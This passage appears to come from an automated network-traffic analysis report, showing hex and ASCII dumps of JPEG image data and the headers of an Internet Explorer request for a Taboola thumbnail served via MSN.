                                                2021-09-10 09:28:24 UTC114INData Raw: b5 99 5b 0e df 4c 1a cb b2 6c 66 1b 87 6e 71 6b d3 5b 3b 5e fb 36 7f 7a 4b a5 90 1c bf a5 cd e6 d5 d5 6d b0 d7 0e 3e 95 60 7c 78 19 7c 64 18 d2 de 56 bf 1a 6c f6 c4 55 25 78 f3 d8 ba 0a e9 5a 3e 40 7e a0 eb 80 22 87 73 49 af f7 a2 dc 96 b7 80 eb 36 f1 b1 f8 9e 26 83 a2 63 43 af b0 e5 5d 52 a4 8d 7f 77 58 5c a2 f1 8e 5a 23 5f c0 8c 82 66 27 38 51 11 c7 b5 0d 99 a8 22 c4 bc b9 65 9b a4 0b 0f 38 ac 96 6b 40 8b 2d d4 9e bd 08 b6 ce 26 58 17 b4 e7 89 c5 2b 58 99 f8 f5 8f cc 45 24 96 2c df b4 d6 09 13 f8 bc de d4 9a cd 3b b3 92 b9 67 cd 5a d3 51 f5 2d 45 be 48 77 80 26 6d 65 fa c9 e3 7b 94 9d 16 58 82 72 fa 27 9e 9a 19 59 fa 61 93 0d 9d 24 e9 88 7e 6d 96 10 ea 66 56 fc cb 58 ed bf 1a 49 ce f1 ad 43 25 9a 14 96 2a 2b 48 6a 25 4c 0f 6d 2d 72 39 9f 90 ed 96 f2 80
                                                Data Ascii: [Llfnqk[;^6zKm>`|x|dVlU%xZ>@~"sI6&cC]RwX\Z#_f'8Q"e8k@-&X+XE$,;gZQ-EHw&me{Xr'Ya$~mfVXIC%*+Hj%Lm-r9
                                                2021-09-10 09:28:24 UTC116INData Raw: 32 98 ad 48 b3 9f ff c4 00 39 11 00 02 02 01 03 03 03 01 07 02 05 02 07 00 00 00 01 02 00 11 03 12 21 31 04 41 51 13 22 61 10 05 20 32 52 71 81 91 14 42 23 30 33 a1 b1 d1 e1 06 15 34 62 72 92 c1 ff da 00 08 01 03 01 01 3f 00 89 f7 cc ee 7e ee 1f f5 d3 f4 31 b9 86 1f b8 7e 87 eb e8 1f ce b0 63 23 fb 84 d3 f2 26 9f 91 2b e4 4a f9 13 4f c8 9a 4c 28 c7 81 3d 2c 9e 07 f3 3d 2c 9f 96 7a 59 7f 2c f4 f2 7e 58 71 64 1f db 31 63 71 95 58 8a 00 4f dc 43 2a 51 94 65 1f 10 83 e2 00 7c 42 a7 c4 d2 de 25 1f 1f e5 98 c4 86 5e db 91 fe 55 cb 32 cc b9 73 d6 f8 3f ed 3d 5f 89 eb 0f 07 f8 9e a8 f0 67 ac be 27 ac 9f 96 0c ab e3 fe 67 a8 be 04 d6 26 b5 f1 3d 45 9a d7 c4 d6 b0 e4 c6 bc 9a 87 2e 20 6b 54 2c ab c9 af d6 7a d8 ff 00 30 a8 1d 09 ad 7b c2 ca 0d 12 6f c5 40 e8 78 61
                                                Data Ascii: 2H9!1AQ"a 2RqB#034br?~1~c#&+JOL(=,=,zY,~Xqd1cqXOC*Qe|B%^U2s?=_g'g&=E. kT,z0{o@xa
                                                2021-09-10 09:28:24 UTC117INData Raw: 6b 3f 94 42 4d 0f fe 42 59 8f 88 33 d9 3c f8 98 91 43 12 09 ad 32 f9 3e 04 ce 4a a2 a8 5a b5 1c cc 67 fc 37 52 78 89 bd 83 31 e7 d0 01 b2 a4 ec 41 99 3d 02 a0 3d 06 e6 c9 9f d4 7d 9c b6 71 67 ca a4 9e 34 98 57 d7 ca 53 15 9c 83 fb 7c 81 11 55 3a 86 af 73 ee 09 aa 02 b7 db cc c6 85 8d 8d 20 a6 ce 5b 6d 30 aa 04 24 59 a3 f8 9b 8b 83 ad 38 f5 04 3a c3 7e 2d 5c 18 9f 68 a8 5d 21 02 0f 8b 8d d5 e3 07 1e 90 e4 03 67 7a 83 a9 c0 7d e1 c0 ae ec be e0 63 e7 6c ed a5 11 98 79 6d c9 8c b8 d4 50 6b 6b e0 6e 3e e6 2c a3 12 d0 16 3b 99 ea 2b 29 2a 6e 35 82 3f 5b 97 1b 22 2b 51 3b cf 50 06 15 bc 0d 60 fc cc d4 f9 02 6e 08 58 8a 00 7d f8 11 38 33 9e 4f 13 a9 44 cb 54 de e1 b1 83 91 31 8d 39 f2 e6 5b d4 18 8f 8a 22 8c c4 30 a5 d3 11 e2 e1 cf fd 3a 12 a3 5b 14 ad 45 68 54
                                                Data Ascii: k?BMBY3<C2>JZg7Rx1A==}qg4WS|U:s [m0$Y8:~-\h]!gz}clymPkkn>,;+)*n5?["+Q;P`nX}83ODT19["0:[EhT
                                                2021-09-10 09:28:24 UTC118INData Raw: c3 cd 08 41 be 62 a9 66 00 08 05 3b 13 bd c5 75 51 0e 5a 22 b7 97 97 26 c0 50 8b 84 8f c4 6c 42 0a b2 87 ae 4d 4c 79 72 ae a6 d4 40 56 36 b5 b3 4e 9f fa 66 cb 8c e7 67 18 c9 5b af 06 65 e8 1c 64 41 8d 3d 96 34 85 e2 a7 fe 5d 93 26 7c a8 f8 c3 2b 31 b0 c2 c1 13 27 4d f6 67 49 97 22 74 38 b4 28 6a bb d5 7f a1 30 23 b9 df bc 57 09 8b 4b 6e 55 7b ff 00 c4 6e 8b 0e 5c 38 f3 e1 66 08 eb 7a 7c 18 3a 2c 38 f4 b1 05 88 16 43 4c 19 94 55 be a0 76 a0 28 4f b4 3a 74 e8 f3 92 05 62 7d d6 3f 52 3f b6 1c ae 4e c6 73 c9 fa 50 b8 00 58 4c d2 d5 31 8a c6 bb 6e 46 f3 45 8b 9e 9e d1 51 41 b0 23 66 00 69 51 bc 7c 8e dc b1 a8 55 5e b5 0b ae 23 61 47 2a 49 3b 4e 67 44 73 3f 48 b8 71 75 8c ae 32 59 c6 5c a5 af 70 26 65 cf e8 66 c7 97 ac 6f 79 04 20 62 68 78 98 f1 a6 30 00 16 7c
                                                Data Ascii: Abf;uQZ"&PlBMLyr@V6Nfg[edA=4]&|+1'MgI"t8(j0#WKnU{n\8fz|:,8CLUv(O:tb}?R?NsPXL1nFEQA#fiQ|U^#aG*I;NgDs?Hqu2Y\p&efoy bhx0|
                                                2021-09-10 09:28:24 UTC120INData Raw: 2c 21 52 0c af a0 24 70 62 f5 6e bb 50 8b 97 52 be 97 21 44 e9 ba 8c 5e aa a0 d5 df 73 33 2e a6 3b 91 b0 dc 4c aa 31 1d f2 0d 8d c7 ea 9d 85 20 d2 25 9f 3f 4a 88 9a ee 63 df 20 1e 25 b8 7b 4e 44 2c 19 98 b7 9e 62 62 39 72 69 5e 00 bb 81 a9 d5 7e 79 99 c1 39 37 24 c4 ad 43 e9 43 c4 0c 40 a0 cc 20 cb 93 f3 83 fa 89 ea 13 76 82 fe 0c 2e 2b dc a4 43 a4 c2 b0 af d2 c8 e2 61 c9 e9 38 7a b1 3a 8e b1 f3 3d a5 aa d5 54 3e 4e e7 ee 58 31 49 e0 6c 26 35 08 a7 7b 27 98 0b d6 56 1c 01 bc 05 1b 6a a3 31 07 0a ec bd 8d 40 c4 e4 40 7b 18 e8 85 f5 b3 7e c2 33 ee 02 a5 2c 05 0f 72 25 af e6 95 2b e9 c7 06 59 97 f1 2f f5 86 a6 91 e6 69 af a6 fe 21 97 0b aa 95 06 cd ca 12 f6 8d e5 66 33 78 72 db 55 ed 73 0e 37 4c 97 ea 2b 0a 35 1b 21 4b 0b df 98 ac 5b 20 26 75 3d 67 a3 92 86
                                                Data Ascii: ,!R$pbnPR!D^s3.;L1 %?Jc %{ND,bb9ri^~y97$CC@ v.+Ca8z:=T>NX1Il&5{'Vj1@@{~3,r%+Y/i!f3xrUs7L+5!K[ &u=g
                                                2021-09-10 09:28:24 UTC122INData Raw: be fb 58 e0 ff 00 e6 15 c8 84 9c 9f 6b e6 e6 1e a5 33 7b 42 b0 2a bd e0 70 a4 6a 3c f9 33 d7 c2 7f 38 83 26 37 25 14 d9 a3 02 b7 00 d6 fd 97 f7 0d 2a 96 62 15 47 24 9a 02 62 eb 13 a8 39 3d 15 7d 2b 54 e4 52 bf da 75 39 97 07 54 ee e4 e1 c7 95 d5 0b a8 d5 b1 1d fc 46 4c 24 31 54 1f 13 d0 19 8f a6 a4 a1 e6 d6 23 b1 54 5b 56 c6 43 7b c7 15 f6 33 1b b6 22 2e ea 62 c8 b9 16 d4 fe 39 11 b7 28 d4 61 19 50 2b 30 05 aa 3e 5c 88 2b 1e 3b 6f 1b cc b9 98 9b 56 2b 6c 02 80 6e a6 46 00 3b 16 2e b4 28 29 be 37 24 13 31 64 ea 51 1d 83 26 aa dc 37 7a d8 71 31 e4 0e 03 01 c8 dd 7c 42 15 b6 20 57 cf 68 99 f1 8c ac 8a 14 21 1f 50 8d 81 b2 1d 4d 92 eb 81 06 04 14 77 30 11 83 35 2a db 11 fa 0b f3 14 95 19 35 6e 41 fc 7a 9e b7 32 b6 74 c0 ab 58 b6 67 3b db 73 4a 36 8b 87 37 59
                                                Data Ascii: Xk3{B*pj<38&7%*bG$b9=}+TRu9TFL$1T#T[VC{3".b9(aP+0>\+;oV+lnF;.()7$1dQ&7zq1|B Wh!PMw05*5nAz2tXg;sJ67Y
                                                2021-09-10 09:28:24 UTC124INData Raw: 97 a8 c0 48 7c 76 bc 9b 89 d5 2e 40 28 1b f0 66 a5 20 06 d8 d7 06 66 2b 81 43 ee 45 d5 8e d3 1f 5d 81 94 8c 8c 15 c5 6d dc dc 3f da 18 85 ff 00 09 a8 77 35 43 ef 31 65 e9 73 12 71 d1 63 bd 19 e9 62 3f 52 0f 33 2b 97 65 4e ca d7 1f 3e 34 34 49 9e ab 84 76 64 02 be 9d f9 99 d3 33 ab 14 76 51 7b 85 33 1f 57 91 06 9c 8b 7a 76 27 93 17 26 1c db 8a 2d e2 75 59 7a 8c 79 57 06 1c 7e c2 2e f7 33 3e 16 c9 5a 76 b3 b9 1b 45 c5 40 80 57 61 bc d5 f9 4b 9e 28 d0 e7 e4 45 54 66 20 8b 01 6e 63 d8 7d 89 81 b5 33 06 1b 29 a1 1d af b1 3f 68 71 86 74 70 a4 91 c3 77 17 0a 8a 76 07 70 d4 09 f8 8e 40 60 4f 01 6e 87 cc c6 cd 88 2b 29 0a 40 1a 49 dc 9b 35 53 ae 6c 58 f0 33 32 db 70 bb 77 33 d1 54 55 77 a0 5b 71 0b 84 02 9c 32 92 d5 a8 ef b1 89 91 91 b4 85 56 5d 89 07 e6 1c 18 ba
                                                Data Ascii: H|v.@(f f+CE]m?w5C1esqcb?R3+eN>44Ivd3vQ{3Wzv'&-uYzyW~.3>ZvE@WaK(ETf nc}3)?hqtpwvp@`On+)@I5SlX32pw3TUw[q2V]
                                                2021-09-10 09:28:24 UTC125INData Raw: c4 e8 f0 83 bb 33 7e 94 20 08 05 28 00 7c 42 40 20 57 d8 c1 ae ad e8 91 33 30 50 1b 63 42 e8 18 3a 9c 9a 81 18 d0 a9 f0 66 4e a1 54 a8 7c 24 1e 58 5f 98 7a ec 21 71 6b 4f 69 e0 73 19 ba 53 8f d4 1b af 81 32 7d 38 df 08 a4 35 2d 89 04 cf 5d ff 00 d3 1b 23 b2 91 3d 42 9d a6 4c bd 41 61 e9 0c 7a 7b 96 8f 9c b8 a5 b1 70 0a fc 3a 41 ab 3f fd ad 3a 93 fc 5f fb 44 45 b3 b8 98 b2 7a 37 48 a7 6e f2 b2 3b 6b 76 b6 b9 8d 07 ed 38 98 9e fc 4e a8 36 5c e9 8d 0d 1d 26 23 1d 0e 5b f2 b4 c1 8c e7 b6 26 90 5e e2 3e 1f 48 8a 36 b1 ac 5c c7 8c 94 08 58 b6 d7 66 68 c8 b6 a1 7c cc 5e a6 3a fe 1e e6 62 4c 7d 48 67 6c 35 93 87 0d c1 fb 43 d2 e3 c6 6c e0 4d 31 57 13 90 88 00 06 62 51 89 15 2e ea 37 d4 b5 3d 50 f6 54 09 90 33 53 2b 1b 1d a2 16 72 41 1f ac 4c 58 f3 8b de c7 8f c4
                                                Data Ascii: 3~ (|B@ W30PcB:fNT|$X_z!qkOisS2}85-]#=BLAaz{p:A?:_DEz7Hn;kv8N6\&#[&^>H6\Xfh|^:bL}Hgl5ClM1WbQ.7=PT3S+rALX
                                                2021-09-10 09:28:24 UTC126INData Raw: f9 87 e3 43 c0 95 e0 91 37 be 45 7c 88 c8 ad f5 22 99 e8 62 3f 93 4c fd 87 10 62 ca c4 12 37 df 99 fb 13 28 1a 0e c2 1c 39 47 e5 da 15 70 37 43 3f 43 01 4b f7 de 98 99 71 80 06 20 28 54 2c 77 84 45 d4 4d 13 1c 11 93 1e d6 44 cb 93 52 00 50 83 17 18 70 18 f6 e2 64 42 98 c9 51 7f 13 17 4e 32 a5 b3 f3 d8 4c fd 0e 1c 63 50 6a 8e 68 1f dc 05 bc 98 1d a0 c9 e4 4d 62 81 36 04 b1 e7 f7 2c f9 96 7e 0c 2a 87 94 10 e3 c2 79 4f f6 87 a7 c4 77 06 a1 42 45 4a 63 cc a7 0c 28 77 99 59 15 d4 93 19 d1 c5 2b 5c 6d 63 60 c6 a6 0d 5b 82 6c 45 27 5b 0e 26 60 c4 6d b9 95 b1 fb 7e f8 35 7b 5a 9e 44 03 4b 29 bb 5b e6 3a 0e 6a 50 f2 61 b1 bd cb 32 fe 0c b1 e7 f1 a1 37 f2 65 98 48 3c a8 32 93 9a 22 5a df 31 6b c8 9e 99 0c 4c 75 33 d4 68 46 b1 a8 73 df f0 1f ba a7 7a ec 66 eb b1 36
                                                Data Ascii: C7E|"b?Lb7(9Gp7C?CKq (T,wEMDRPpdBQN2LcPjhMb6,~*yOwBEJc(wY+\mc`[lE'[&`m~5{ZDK)[:jPa27eH<2"Z1kLu3hFszf6
                                                2021-09-10 09:28:24 UTC128INData Raw: a0 db b4 f9 41 a1 da b0 07 69 0f 1f 03 8b 34 2d b8 01 20 f2 9f 77 f3 a2 22 82 49 6b 20 9e c3 8c e0 9e 3f 9d a9 9b ec 8a dd 89 3b 65 98 dc 10 ac 78 e0 8e 09 19 1b 6a 37 02 bc 12 a1 71 8a a8 62 91 0e 11 7d ca 32 d7 95 20 f4 ab eb 84 7d 2f a9 84 4f 0c a0 9f 06 2e e2 22 32 7d 2c ab bf 47 1c 85 d4 25 a5 70 cc 05 37 50 01 e0 1c a6 47 50 ae 07 04 a1 ab e7 09 a9 5a a4 00 53 f0 2d b8 c3 d3 ad f7 c0 d7 a9 05 4e 43 a8 8c 58 52 16 66 db 5d a8 81 fc da 62 02 c8 df 6a c6 3d 89 02 ef 77 de 2f 68 16 07 20 83 90 f8 71 44 b1 83 18 56 0f b1 39 76 a6 5e 4e 69 9f 55 3f 3a 19 66 da 02 c9 3a 84 09 f8 ca e2 9f 00 08 e5 8d 16 8c 52 2d ab 23 7a 9b 04 86 ee 3f 95 24 4d ac 18 5f 43 d8 e3 15 24 15 40 7a 57 76 c2 ac 3e d1 59 b9 04 fa 58 c0 c4 1d ac 00 e9 78 5c 8d 33 4b 43 8f 24 7d 42
                                                Data Ascii: Ai4- w"Ik ?;exj7qb}2 }/O."2},G%p7PGPZS-NCXRf]bj=w/h qDV9v^NiU?:f:R-#z?$M_C$@zWv>YXx\3KC$}B
                                                2021-09-10 09:28:24 UTC129INData Raw: c2 be 2c c7 86 75 7f c0 07 65 cd f1 6f 52 49 1c a2 bf 51 63 d6 b0 f2 13 c4 04 fe 20 01 07 cb d3 8e 99 64 11 b9 24 42 c8 1b b5 f4 bc 8f 51 38 d1 ac 71 b4 7e 50 14 3b 12 05 e4 33 81 16 dd c1 82 5b fe 6e 43 e1 69 7f 02 00 3c fb 4d d7 1d 1b 1c 78 9a 90 91 26 c0 01 32 7d e6 bb f6 61 83 43 ac 9e 29 a5 d3 1a db 1e a1 c8 2e 5b a9 2a 4f 2b 93 c3 32 a1 89 5a 32 7c 52 5b f0 28 00 85 bf 5b c1 03 09 8c c4 c9 e6 9a 42 7b 33 2f 41 9a 89 e6 94 11 49 3a 2d 50 24 ed b4 00 63 22 e9 a4 dd 2c 12 eb 5d e5 9b 8a 00 3a 04 54 cd 78 29 09 91 5f 55 0a dc 12 5d 57 8a d4 9b 3f 51 1b b1 da 69 a3 21 00 3c af b5 16 8b 39 cd 54 91 ee e1 f5 01 55 8f c1 6e b2 b8 ce b9 cf 6c 63 b9 11 6d 79 6f 09 45 2d 91 db 12 64 7e 58 31 e5 71 1b eb 5a 46 68 94 9b 33 3f 8c 8f b5 00 ee c0 63 6d ea 50 92 a5
                                                Data Ascii: ,ueoRIQc d$BQ8q~P;3[nCi<Mx&2}aC).[*O+2Z2|R[([B{3/AI:-P$c",]:Tx)_U]W?Qi!<9TUnlcmyoE-d~X1qZFh3?cmP
                                                2021-09-10 09:28:24 UTC130INData Raw: c5 db a9 d3 49 21 03 b3 0e 40 1f 22 32 db c7 58 83 37 36 41 3c e3 4b 1c 88 7c 48 d0 94 be 0f 98 90 0d 72 30 c1 0c 31 1d 4e aa 45 34 7c 18 8f 20 0c 80 22 ed 57 2c 48 6b e9 67 61 50 4e 26 9b c5 0b b6 48 1c df 23 d1 c9 0c 07 c0 e3 06 50 a6 19 52 c8 60 56 c5 af 63 ce 48 8c 23 a8 a5 d8 5f 91 54 8c 2c 52 1d b8 35 83 c2 2e 93 c0 a8 a1 5f 9a 50 1c 7b 70 c3 a7 d4 b9 59 d1 49 a9 24 b0 0b 3f 61 f7 70 b7 82 ea 61 5f 10 f0 19 c7 51 9a 97 20 6e 90 e9 c6 e7 40 0d ee 0a 6e c0 c8 da 47 0a 44 fa 62 62 96 02 a3 93 24 5d 48 c7 3f 48 4f a5 5d 2c 92 b1 1c c6 1d 9d af e1 8e fa 47 8c 2c 6d b0 ab 7a f7 1e be b9 28 11 6a 54 44 24 60 cc 16 42 16 af d9 58 40 9e 67 2d 5e b1 a8 53 ff 00 15 e5 41 30 71 27 ad 93 b8 11 82 38 f6 aa af 03 91 91 ac e8 ac d0 c4 9c b5 6d da a0 01 d0 2e 5a 78
                                                Data Ascii: I!@"2X76A<K|Hr01NE4| "W,HkgaPN&H#PR`VcH#_T,R5._P{pYI$?apa_Q n@nGDbb$]H?HO],G,mz(jTD$`BX@g-^SA0q'8m.Zx
                                                2021-09-10 09:28:24 UTC132INData Raw: ba bd ca 3a 1b cf 05 6b 96 b2 4e 37 07 a1 6b bc 17 7c 13 ed c0 41 6e 4d f2 c3 db dc e0 67 12 a9 da a6 c2 8f 68 ea 70 02 aa 6a 44 a5 dc 39 ea 3b 75 cb 24 71 c9 24 e0 54 1c 80 0d d1 f8 e0 65 0d 49 dc 57 7c 61 6d b4 6d be ad c7 4f 4c 7d aa 38 fc 3b 89 e8 68 d6 1d d5 4a 0f 37 d8 9f 75 8c 69 e7 a2 0d 50 8c 11 54 49 f5 1e 83 1e 48 d7 8e b4 87 6e 79 45 d0 a2 bb 49 3c 8b 5e 72 45 42 57 c9 da ff 00 56 e0 49 c2 0d f2 47 51 81 e0 9f 41 e1 e9 a7 68 84 8a 92 f2 43 77 da 4d e3 de 8b 46 91 fd 29 ab 11 08 d0 c8 63 55 e5 b8 de cb 8b 2c 80 70 ef eb ec eb 59 f4 57 d1 ba 39 dc 23 24 05 f7 10 de ac 46 19 f4 da 8d 5a c5 a9 78 a2 d8 62 53 dc 59 6c 96 4d 31 e3 52 24 6d ed 1b f6 90 90 00 00 f4 39 c9 5b 07 f5 0e 6f 19 26 20 06 92 27 28 c7 df b6 b7 7c 72 67 5f ca db 3f 7a 5b c0 48
                                                Data Ascii: :kN7k|AnMghpjD9;u$q$TeIW|ammOL}8;hJ7uiPTIHnyEI<^rEBWVIGQAhCwMF)cU,pYW9#$FZxbSYlM1R$m9[o& '(|rg_?z[H
                                                2021-09-10 09:28:24 UTC133INData Raw: 5e 0b 08 67 d4 a5 ef d9 ed e8 e0 66 9d 5e 69 36 99 df 71 11 0b e2 82 11 c6 2e ac 92 c6 49 25 21 4f fb a5 1c 2e 1f 1a 67 8a e0 31 9d eb b5 c3 1c 30 c2 b2 49 bb 67 91 9b 7b 12 77 3e 19 9d 24 03 67 a6 e0 00 af 96 26 8e 72 7e cc ca a4 44 e3 ba 6e ec e0 e2 b9 23 7a 90 4d 1a f4 6e 87 27 97 53 34 81 4a b3 7d 9a 2d 12 4f 38 51 87 55 3d 46 16 88 1a ba ea 4f 6c aa 60 c9 d6 c8 f4 c6 06 f8 be 78 39 4e a4 b8 3f 10 30 0f a5 be 8b 5f b4 7e fa 8d 37 70 de a5 72 a1 d4 49 53 47 d9 1c fe 25 f5 56 c4 8f 5f f5 b5 95 35 4d d6 34 ff 00 56 7b 1c 06 69 a5 04 59 fb 53 43 9f f6 46 15 04 5f 23 e1 7c e2 0e 6c 9b da 08 cf 27 de 1c 8a bf 51 94 ad c8 66 37 4f 90 b9 75 e8 7c bc fa 77 c4 51 03 06 32 19 11 55 58 74 ea 46 26 96 72 47 db 97 b3 2b b7 7f 1b f0 92 7b 35 28 c0 34 41 d7 c6 60 43
                                                Data Ascii: ^gf^i6q.I%!O.g10Ig{w>$g&r~Dn#zMn'S4J}-O8QU=FOl`x9N?0_~7prISG%V_5M4V{iYSCF_#|l'Qf7Ou|wQ2UXtF&rG+{5(4A`C
                                                2021-09-10 09:28:24 UTC135INData Raw: f2 17 e1 85 9f 76 42 67 3c 33 4a be 2b 12 3b af 60 32 44 d5 74 93 80 a8 ca 3b 80 32 45 91 82 ee e7 8c 97 6a 1b 4a c0 1d 75 31 b3 3f 42 06 ee 70 32 37 2a c3 a1 07 f9 be ab f4 b6 9b 9d 2e ac 71 75 d1 1e bb 67 d5 3e 99 81 b6 bc 6f c2 cf 5d d7 35 50 40 48 1a fd 32 39 0b 13 9e 92 85 f4 6c 83 52 be 92 c4 bf d5 6b 21 7d 82 dd a2 76 4c d6 e9 8f a9 50 eb 90 29 3d a5 b8 cf fc 59 0c c3 d6 37 0d fd 30 e1 c5 71 e8 c0 1c d2 39 3d fc 30 a7 f6 c9 61 3f ea e4 39 ac 83 d1 5b a7 ed 59 a4 d6 44 c2 8a 4a 4f fd 58 c5 4b 5d c4 43 66 a5 0a f1 e6 43 94 57 8e 70 64 d1 e9 4b 5c b3 c8 3c 33 b7 f4 83 c9 c6 97 e8 fd 43 7f e5 27 3f 87 f4 9f e7 68 35 71 ff 00 f4 ba d4 fb f1 1e a0 1f 55 c4 02 78 9a 38 3e 91 2b be 0d 54 47 8a 7c 82 5f a2 35 0d bf 4f ac 79 97 64 68 dd 9f 22 46 d5 32 87 9c
                                                Data Ascii: vBg<3J+;`2Dt;2EjJu1?Bp27*.qug>o]5P@H29lRk!}vLP)=Y70q9=0a?9[YDJOXK]CfCWpdK\<3C'?h5qUx8>+TG|_5Oydh"F2


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.549818151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:24 UTC65OUTGET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg HTTP/1.1
                                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: img.img-taboola.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:24 UTC92INHTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 15107
                                                Server: nginx
                                                Content-Type: image/jpeg
                                                access-control-allow-headers: X-Requested-With
                                                access-control-allow-origin: *
                                                edge-cache-tag: 434421233783553505689275387282581492423,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
                                                etag: "09a6961e625e1651f3f490355f583dd3"
                                                last-modified: Wed, 25 Aug 2021 13:35:26 GMT
                                                status: 200 OK
                                                timing-allow-origin: *
                                                x-ratelimit-limit: 101
                                                x-ratelimit-remaining: 100
                                                x-ratelimit-reset: 1
                                                x-request-id: b50551b2b2b1e46afdfab3b3f3ddd4e1
                                                x-envoy-upstream-service-time: 9
                                                X-backend-name: US_DIR:3FP7YNX3LMizprTZsG7BSW--F_US_nlb102
                                                Via: 1.1 varnish, 1.1 varnish
                                                Cache-Control: public, max-age=31536000
                                                Accept-Ranges: bytes
                                                Date: Fri, 10 Sep 2021 09:28:24 GMT
                                                Age: 1366323
                                                X-Served-By: cache-wdc5561-WDC, cache-dca17753-DCA, cache-hhn4055-HHN
                                                X-Cache: HIT, HIT, HIT
                                                X-Cache-Hits: 1, 1, 2
                                                X-Timer: S1631266105.734142,VS0,VE0
                                                Vary: ImageFormat
                                                X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5f3d7819fc402dab11ff0cbe39c46367.jpg
                                                X-vcl-time-ms: 0
                                                2021-09-10 09:28:24 UTC93INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 01 05 05 05 05 05 05 06 06 06 06 08 09 08 09 08 0c 0b 0a 0a 0b 0c 12 0d 0e 0d 0e 0d 12 1b 11 14 11 11 14 11 1b 18 1d 18 16 18 1d 18 2b 22 1e 1e 22 2b 32 2a 28 2a 32 3c 36 36 3c 4c 48 4c 64 64 86 ff c2 00 11 08 01 37 00 cf 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 04 05 03 06 00 02 07 01 08 09 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 47 76 ae 59 37 8f 65 d7 6a 5b 4b a6 ed 12
                                                Data Ascii: JFIF+""+2*(*2<66<LHLdd+""+2*(*2<66<LHLdd7"4GvY7ej[K
                                                2021-09-10 09:28:24 UTC94INData Raw: a4 da e6 27 02 bc c0 ff c4 00 2b 10 00 02 02 02 02 02 02 02 01 04 03 01 01 00 00 00 02 03 01 04 05 11 00 12 06 13 14 21 22 31 07 23 32 41 51 10 15 42 24 33 ff da 00 08 01 01 00 01 09 00 fe 3f 46 b1 17 df 31 ae 47 eb 91 fa d7 06 3f e0 22 27 8b 08 9d 6b 80 31 03 25 bc d7 9b d4 c3 b6 55 b6 ff 00 2f 67 16 dd d3 0b bf cb be 5d 79 00 89 65 8f 2b cd df 19 f7 e5 2a 79 37 90 d2 97 7c 6c a9 f9 36 7e c9 74 2b f7 e6 d2 16 0c b2 6e 33 89 3e f2 4e de fa c8 47 63 39 89 9d 1d 8d 73 17 45 b5 f6 50 62 4a e9 09 9a e1 68 6e 35 6a 07 90 f5 98 18 10 9b 73 64 cc 57 4f 08 b2 74 83 39 e1 ea f8 fe 2f 8f 8d 46 e7 91 1a e4 6f eb 83 3b df d8 fe f9 13 00 31 33 cf 20 f2 95 61 ab 9c a9 19 9f 3b cb df 39 1f 6d ab 16 af bc dc 4c eb 2b 88 ec 7e d9 ff 00 72 cf f1 b0 6c 6e 39 48 ab d7 4c d8
                                                Data Ascii: '+!"1#2AQB$3?F1G?"'k1%U/g]ye+*y7|l6~t+n3>NGc9sEPbJhn5jsdWOt9/Fo;13 a;9mL+~rln9HL
                                                2021-09-10 09:28:24 UTC96INData Raw: 99 fd d7 b6 3b 8f b1 7e c0 fa 0f 95 de 17 be c2 5b 17 0e 57 30 02 9f 1c cc ba 6d 85 1b 67 51 0d 42 60 08 9e 92 95 1e 8f 23 0c 12 1f c6 17 fa 22 8c bd 88 49 c2 63 80 1b d4 73 0c 0a f6 2c cf 99 9c 64 5f 58 14 da c5 e3 71 b5 86 bb 28 5e b0 16 6e 43 d5 93 a4 18 aa 95 c2 59 54 bc 6b c9 6e 78 ab a7 d1 8a f3 2f 3d ce 79 6c 85 3a a7 94 c8 16 19 a5 2a 66 4c be 4b da e0 ab 2d 8d ff 00 77 b3 5f e6 5b 11 cf 93 3b d6 c6 d4 c4 fe d3 74 c7 ff 00 55 32 4e dc 6a 43 24 e8 ad 30 44 f7 49 bd d3 5f 99 4b 9d a5 6b 98 48 14 28 9e 07 83 c9 85 ca c9 51 95 90 1a e9 b2 7d 2c 55 3b 44 b1 08 cb d8 4d 59 95 2c e6 48 ca 64 b8 a0 de 86 38 33 0b 91 d4 d5 bf 21 23 26 aa 67 4c e4 18 0d e9 72 82 26 1a 37 6c b6 61 00 d1 ad 7c ca c8 13 20 73 c8 a7 67 dc ba f6 18 6f 75 8b 4d 8a 29 9c bf ff 00
                                                Data Ascii: ;~[W0mgQB`#"Ics,d_Xq(^nCYTknx/=yl:*fLK-w_[;tU2NjC$0DI_KkH(Q},U;DMY,Hd83!#&gLr&7la| sgouM)
